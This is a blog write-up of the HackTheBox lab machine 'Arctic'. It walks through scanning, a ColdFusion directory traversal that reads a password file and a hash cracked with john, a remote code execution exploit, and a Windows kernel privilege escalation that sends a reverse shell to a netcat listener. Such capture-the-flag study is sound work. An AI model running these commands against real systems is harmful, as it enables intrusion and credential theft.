Flop.py
Posts Tags Categories About us
Flop.py

Contents

🕵 HTB-Writeup : ARCTIC

Pezzz included in HackTheBox
   575 words   3 minutes  Views
/htb-writeup-arctic/featured-image.png

Recon

nmap

1
2
3
4
5
6
7

└─$ rustscan -a 10.10.10.11 -b 2500 -- -T5 -Pn -sV -A

PORT      STATE SERVICE REASON  VERSION
135/tcp   open  msrpc   syn-ack Microsoft Windows RPC
8500/tcp  open  fmtp?   syn-ack
49154/tcp open  msrpc   syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We face a Windows machine with only a rpc service and an unknown service on port 8500.

While browsing, I found that port 8500 as been assigned to Adobe ColdFusion.

Vulnerabilities

Running a searchexploit research, we found that Adobe ColdFusion as several vulnerabilities on multiple version.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22

└─$ searchsploit adobe cold   
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting                                | cfm/webapps/36067.txt
Adobe ColdFusion - Directory Traversal                                             | multiple/remote/14641.py
Adobe ColdFusion - Directory Traversal (Metasploit)                                | multiple/remote/16985.rb
Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE) | windows/remote/50781.txt
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code  | windows/remote/43993.py
Adobe ColdFusion 2018 - Arbitrary File Upload                                      | multiple/webapps/45979.txt
Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting                  | cfm/webapps/29567.txt
Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities                 | cfm/webapps/36172.txt
Adobe ColdFusion 8 - Remote Command Execution (RCE)                                | cfm/webapps/50057.py
Adobe ColdFusion 9 - Administrative Authentication Bypass                          | windows/webapps/27755.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass (Metasploit)             | multiple/remote/30210.rb
Adobe ColdFusion < 11 Update 10 - XML External Entity Injection                    | multiple/webapps/40346.py
Adobe ColdFusion APSB13-03 - Remote Multiple Vulnerabilities (Metasploit)          | multiple/remote/24946.rb
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site | cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Quer | cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String  | cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' C | cfm/webapps/33168.txt
----------------------------------------------------------------------------------- ---------------------------------

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

# Adobe ColdFusion - Directory Traversal | multiple/remote/14641.py

└─$ python2 14641.py 10.10.10.11 8500 ../../../../../../../lib/password.properties

------------------------------
#Wed Mar 22 20:53:51 EET 2017
rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP  \n
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
encrypted=true
------------------------------

└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Press 'q' or Ctrl-C to abort, almost any other key for status
happyday         (?)

First shell

1
2
3
4
5
6
7

# Adobe ColdFusion 8 - Remote Command Execution (RCE) | cfm/webapps/50057.py

C:\ColdFusion8\runtime\bin>whoami
arctic\tolis

C:\Users\tolis\Desktop>type user.txt     
**************************879c17

Path to the privesc

Local recon

Windows-exploit-suggester

1
2
3
4
5
6
7
8

└─$ python2 windows-exploit-suggester.py -d 2022-09-06-mssb.xls -i sysinfo -l     
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[*] done

We found that the there is a vulnerability in the Tracing Feature for Services that could allow an elevation of privilege.

After finding an exploit on github, I upload it on the target and execute it.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

# On the target
C:\Windows\Temp\c>.\Chimichurri.exe 10.10.16.11 4446

# On the host
└─$ rlwrap nc -lnvp 4446                           

C:\Windows\Temp\c>whoami
nt authority\system

C:\Users\Administrator\Desktop>type root.txt
**************************b97a0a

We are now system owner! We can get the root flag :)

Tags

Easy, External, CMS, Penetration Tester Level 1, Unrestricted File Upload, A06:2021-Vulnerable And Outdated Components, Windows Vulnerabilities, Misconfiguration

Updated on 2022-09-19
Read Markdown
 Windows-Box
Back | Home